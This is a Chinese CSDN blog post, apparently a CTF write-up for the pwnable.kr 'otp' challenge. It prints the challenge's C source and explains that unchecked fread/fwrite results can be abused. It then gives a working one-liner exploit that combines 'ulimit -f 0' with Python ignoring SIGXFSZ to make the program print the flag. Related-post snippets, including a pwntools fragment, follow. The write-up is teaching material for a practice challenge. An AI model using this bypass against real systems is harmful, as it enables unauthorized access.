pwnable(otp)(open,read等函数的检查缺失)

最新推荐文章于 2022-02-06 07:56:16 发布
最新推荐文章于 2022-02-06 07:56:16 发布
阅读量382 收藏
点赞数
分类专栏: linux ctf pwn技巧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38204481/article/details/82912105
版权
pwn技巧 同时被 3 个专栏收录
14 篇文章 2 订阅
订阅专栏
ctf
12 篇文章 0 订阅
订阅专栏
linux
9 篇文章 0 订阅
订阅专栏

远程拷贝文件到本地 scp -P 2222 otp@pwnable.kr:/home/otp/opt .

学习到的函数strtoul(argv[1], 0, 16)str转化位long,以16进制方式。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

int main(int argc, char* argv[]){
	char fname[128];
	unsigned long long otp[2];

	if(argc!=2){
		printf("usage : ./otp [passcode]\n");
		return 0;
	}

	int fd = open("/dev/urandom", O_RDONLY);
	if(fd==-1) exit(-1);

	if(read(fd, otp, 16)!=16) exit(-1);
	close(fd);

	sprintf(fname, "/tmp/%llu", otp[0]);
	FILE* fp = fopen(fname, "w");
	if(fp==NULL){ exit(-1); }
	fwrite(&otp[1], 8, 1, fp);
	fclose(fp);

	printf("OTP generated.\n");

	unsigned long long passcode=0;
	FILE* fp2 = fopen(fname, "r");
	if(fp2==NULL){ exit(-1); }
	fread(&passcode, 8, 1, fp2);
	fclose(fp2);
	
	if(strtoul(argv[1], 0, 16) == passcode){
		printf("Congratz!\n");
		system("/bin/cat flag");
	}
	else{
		printf("OTP mismatch\n");
	}

	unlink(fname);
	return 0;
}

程序生成了一个随机数放入文件,然后读取这个文件然后让这个文件跟输入的password进行比较相同获取shell。

这里可以观察到fread(&passcode, 8, 1, fp2);是没有验证是否成功的,如果能够打开文件成功但是读取文件中内容的时候失败就能获取shell。
接下来就是想办法控制完成这一条件
可以用ulimit
ulimit了解一下
在这里可以设置文件

otp@ubuntu:~$ ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) 1500000
scheduling priority             (-e) 0
file size               (blocks, -f) 120000
pending signals                 (-i) 31753
max locked memory       (kbytes, -l) 64
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1500
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 8192
cpu time               (seconds, -t) unlimited
max user processes              (-u) 300
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited
otp@ubuntu:~$ ulimit -f 0
otp@ubuntu:~$ ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) 1500000
scheduling priority             (-e) 0
file size               (blocks, -f) 0
pending signals                 (-i) 31753
max locked memory       (kbytes, -l) 64
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1500
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 8192
cpu time               (seconds, -t) unlimited
max user processes              (-u) 300
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited

设置shell所能创建的最大文件为0
但是这个时候执行的时候会报错

otp@ubuntu:~$ ./otp 0
File size limit exceeded

这个错误是作为信号进行传播的,linux系统中信号是可以被忽略的

import signal
signal.signal(signal.SIGXFSZ,signal.SIG_IGN)

可以在python的交互窗口中获取shell

>> import os,signal
>>> signal.signal(signal.SIGXFSZ,signal.SIG_IGN)
1
>>> os.system('./otp 0')
OTP generated.
Congratz!
Darn... I always forget to check the return value of fclose() :(
0

但是我们还可以直接用一条命令来输出

ulimit -f 0 && python -c "import os,signal; signal.signal(signal.SIGXFSZ,signal.SIG_IGN); os.system('./otp 0')"

分析:设置ulimit -f 0使fwrite(&otp[1], 8, 1, fp);失败,创建的文件中数据写入失败读取出来的就是0

总结:liunx信号可以忽略,ulimit可以控制进程分佩的资源。
参考:https://nickcano.com/pwnables-write-ups-oct17/

九层台
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
otp-win64-26.0
06-16
otp_win64_26.0安装包
pwnable.kr】 otp
子曰小玖的博客
06-06 1074
https://r00tnb.github.io/2018/02/26/pwnable.kr-otp/ 前言 开始一直在找溢出点哈哈,最后实在没有头绪看了别人的writeup 分析 先分析源码otp.c 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32...
pwnable.kr详细通关秘籍(二)
dfdhxb995397的博客
09-27 375
i春秋作家:W1ngs 原文来自:pwnable.kr详细通关秘籍(二) 0x00 input 首先看一下代码: 可以看到程序总共有五步,全部都满足了才可以得到flag,那我们就一步一步来看 这道题考到了很多linux下的基本操作,参数输入、管道符、进程间通信等知识,推荐大家可以先看看《深入理解计算机系统这本书》,补补基础 1、Step1(argv) if(ar...
pwnable_hacknote
z1r0的博客
12-28 325
pwnable_hacknote 查看保护 通过uaf改content指针为got,泄露出libc,接着改puts指针为system,放入;/sh\x00即可。 pwnable专题 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27791) else:
pwnable-lotto
网安星空
02-06 213
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是lotto,主要考察的是源代码审计和逻辑漏洞的利用。
pwnable.kr之otp
Jason_ZhouYetao的博客
07-15 693
这个可以说是考察一个全新的知识点,不是栈溢出什么的,只是限制创建文件的大小,具体的ulimit命令可以参考这个网站 ulimit命令详解 打开题目的otp.c发现是对于passcode进行比较所以对于其创建文件的大小限制为0就可以了; ulimit -f 执行这个命令就可以了,之后写一个简单的python脚本,如下: #!/user/bin/python import subproc...
c语言编译otp,OTPROM型单片机内部存储器的使用研究
weixin_39933082的博客
05-24 666
随着变频调速以及微机控制技术的发展,适应电机控制的Intel 8XC196MC系列单片机应用越来越广泛。与80C196MC相比,87C196MC单片机带有16 KB的OTPROM(One Tline Programmable Read-Only Memory),可以进行片内编程操作,而且可以增强加密功能。对于普通的控制系统来说,其存储容量足够大,不必再使用外部扩展存储器。然而87C196MC单片机...
原创一次性口令(OneTimePassword)C语言源码
11-09
这是本人原创首创独创算法,可应用于SSH作为登入口令。 技术是一种接近自然随机数算法:均态分布随机数算法(非正态分布/高斯分布随机数算法)。 可能是超简单、超快速、超高效的口令生成器。 欢迎各路加解密精英高手破解,如果您破解了,拜请通知我。
pwnable.kr ascii_easy writeup
charlie_heng的专栏
02-12 1704
兜兜转转,又回来这里刷题 这题讲真有点难度,虽然在实际比赛的时候比较少可能会出现这类题…….. 很明显可以用rop,但是rop链只能全部为ascii可见字符…..这就有点难度了 这题其实我想了好几种办法,但是实际用了只有一种,不过在这里也说下 利用rop链将ebx的值改为libc中got表的地址,然后跳转到one gadget 这个本来感觉是最快捷的办法,但是将gadget过滤掉一部分...
erlang otp25 win安装包
07-19
erlang otp25 win安装包
otp-view:OTP视图
05-10
OTP视图 准备使用一次性密码组件。 用法 XML格式 < com .hololo.library.otpview.OTPView android : layout_width = " match_parent " android : layout_height = " wrap_content " android : gravity = " ...
otp_win64_25.0.2.exe
06-22
Erlang/OTP
otp-win64-19.3
11-10
otp_win64_19.3 稳定官网版本
otp.rar_OTP
09-21
include linux mfd wm831x otp.h OTP interface for WM831x.
otp.zip_OTP_替换算法otp
09-14
几种页面置换算法如先进先出,最佳置换,最近最久未使用算法
otp-OTP-19.3.zip
03-24
otp
Erlang/OTP 26.2.1
最新发布
01-10
Erlang/OTP 26.2.1,Erlang,OTP,26.2.1
手机高清摄像头OTP技术详解
01-20
手机高清摄像头OTP技术详解  随着5Meg 、8Meg、12Meg 等高像素摄像头在手机中的应用越来越广,终端客户对camera的成像效果和品质要求越来越高,如何提升摄像头模组的一致性和各方面的性能已显得尤为重要。今天就为...
OTP Repair Margin Read
07-28
根据提供的引用内容,我们可以得出以下结论: OTP Repair Margin Read是关于异步通信中的数据格式的问题。在异步通信中,数据格式包括起始位、数据位、奇偶校验位、停止位和空闲位。 起始位是一个持续一个比特时间的“0”,用于标志传输一个字符的开始。 数据位紧跟在起始位之后,是通信中的真正有效信息。数据位的位数可以由通信双方共同约定,一般可以是5位、7位或8位。传输数据时先传送字符的低位,后传送字符的高位。 奇偶校验位是用于进行奇校验或偶校验的一位数据。奇偶校验位不是必须有的,它可以用于保证传输的数据总共有奇数个或偶数个“1”。奇偶校验位仅对数据进行简单的置逻辑高位或逻辑低位,不会对数据进行实质的判断。它的作用是让接收设备能够知道一个位的状态,判断是否有噪声干扰了通信以及传输的数据是否同步。 停止位可以是1位、1.5位或2位,用于标志传输一个字符的结束。停止位一定是“1”。 空闲位是指从一个字符的停止位结束到下一个字符的起始位开始的时间段,表示线路处于空闲状态,必须由高电平来填充。 关于OTP Repair Margin Read的具体内容,引用中没有提供相关信息。如果您有关于OTP Repair Margin Read的具体问题,请提供更多的上下文信息,以便我能够更好地回答您的问题。 #### 引用[.reference_title] - *1* *2* *3* [C——Linux下的串口编程](https://blog.csdn.net/qq_38545868/article/details/84950052)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值